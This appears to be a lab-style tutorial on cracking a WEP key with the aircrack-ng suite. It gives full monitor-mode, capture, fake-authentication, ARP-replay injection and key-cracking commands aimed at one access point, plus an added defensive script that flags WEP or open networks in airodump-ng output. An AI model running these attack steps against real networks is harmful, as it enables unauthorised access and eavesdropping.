Wireless Hacking - WEP Key Crack
0x00. Environment Setup
OS : BackTrack 5 R3 (32-bit)
Kernel : Linux bt 3.2.6
0x01. iwconfig
Configure a wireless network interface.
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.
# iwconfig
0x02. airmon-ng
airmon-ng is a script that can be used to enable monitor mode on wireless interfaces.
airmon-ng <start|stop> <interface>
# airmon-ng start wlan0
0x03. airodump-ng
A wireless packet capture tool for aircrack-ng.
airodump-ng [options] <interface>
# airodump-ng mon0
To capture traffic from a specific wireless network:
[Options]
-c <channel>[,<channel>[, ...]]
--channel <channel>[,<channel>[, ...]]
: Indicate the channel(s) to listen to. By default airodump-ng hops across the 2.4GHz channels.
-w <prefix>
--write <prefix>
: The dump file prefix to use. If this option is not given, data is only shown on the screen. Besides the capture file, a CSV file with the same filename as the capture will be created.
[Filter options]
-d <bssid>
--bssid <bssid>
: It will only show networks, matching the given bssid.
# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w WEP-Key mon0
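The CSV that -w writes next to the capture is also useful from the defensive side: the following added example (not part of the original post) reads it and lists access points that still advertise WEP or no encryption so they can be reconfigured. The column order is an assumption about the airodump-ng CSV layout, and every row except the lab AP's BSSID and ESSID is constructed.

```python
"""Audit an airodump-ng CSV for APs that still advertise WEP or no encryption."""

# Constructed sample (not real capture data). Column order is an assumption
# about the CSV that airodump-ng writes next to the .cap file.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
64:E5:99:0F:38:E2, 2013-01-10 14:02:11, 2013-01-10 14:09:40, 9, 54, WEP, WEP, , -41, 412, 1830, 0.0.0.0, 3, WEP,
AA:BB:CC:00:00:01, 2013-01-10 14:02:12, 2013-01-10 14:09:40, 1, 54, WPA2, CCMP, PSK, -60, 120, 0, 0.0.0.0, 10, Office,Lab,
AA:BB:CC:00:00:02, 2013-01-10 14:02:15, 2013-01-10 14:09:38, 6, 54, OPN, , , -70, 50, 0, 0.0.0.0, 5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:08:9F:DA:BF:BF, 2013-01-10 14:03:01, 2013-01-10 14:09:40, -30, 900, 64:E5:99:0F:38:E2,
"""

WEAK_PRIVACY = {"WEP", "OPN"}
N_FIXED = 13  # number of columns that precede ESSID


def parse_access_points(text):
    """Return one dict per access-point row; the client section is ignored."""
    aps, header = [], None
    for line in text.splitlines():
        fields = [f.strip() for f in line.split(",")]
        if fields[0] == "BSSID":
            header = fields
        elif fields[0] == "Station MAC":
            break  # client section follows; not needed for this audit
        elif header and len(fields) >= len(header):
            ap = dict(zip(header[:N_FIXED], fields[:N_FIXED]))
            # An ESSID may contain commas, so slice it by ID-length
            # instead of trusting the comma split (ASCII ESSIDs assumed).
            tail = line.split(",", N_FIXED)[N_FIXED]
            ap["ESSID"] = tail[1:1 + int(ap["ID-length"])]
            aps.append(ap)
    return aps


def weak_networks(text):
    """Return (BSSID, ESSID, Privacy) for every AP using WEP or no encryption."""
    return [(ap["BSSID"], ap["ESSID"], ap["Privacy"])
            for ap in parse_access_points(text)
            if WEAK_PRIVACY & set(ap["Privacy"].split())]


if __name__ == "__main__":
    for bssid, essid, privacy in weak_networks(SAMPLE_CSV):
        print(f"{bssid}  {essid!r:14} {privacy}: weak or no encryption")
```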
0x04. aireplay-ng
Inject packets into a wireless network to generate traffic.
The fake authentication attack.
aireplay-ng <options> <replay interface>
[Attack modes]
-1 <delay>
--fakeauth=<delay>
: The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) plus associate with the access point (AP).
[Replay options]
-e <essid>
: Fake Authentication attack: Set target SSID.
-a <bssid>
: Set Access Point MAC address.
-h <smac>
: Set source MAC address.
# aireplay-ng -1 0 -e WEP -a 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0
The classic ARP request replay attack.
aireplay-ng <options> <replay interface>
[Attack modes]
-3
--arpreplay
: The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably.
[Filter options]
-b <bssid>
: MAC address of Access Point.
[Replay options]
-h <smac>
: Set source MAC address.
# aireplay-ng -3 -b 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0
0x05. aircrack-ng
An 802.11 WEP / WPA-PSK key cracker.
aircrack-ng [options] <.cap / .ivs file(s)>
# aircrack-ng WEP-Key-01.cap